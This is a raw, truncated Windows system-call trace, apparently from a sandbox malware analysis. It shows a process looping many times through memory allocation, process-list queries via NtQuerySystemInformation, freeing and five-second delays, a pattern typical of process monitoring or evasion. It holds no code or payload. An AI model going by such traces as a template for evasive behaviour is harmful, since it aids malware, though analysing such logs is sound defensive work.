NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.803] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.833] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.848] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.863] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.880] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.895] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.915] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.925] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.943] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.957] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.974] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.989] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.004] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.020] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.035] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.050] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.075] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.085] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.104] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.113] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 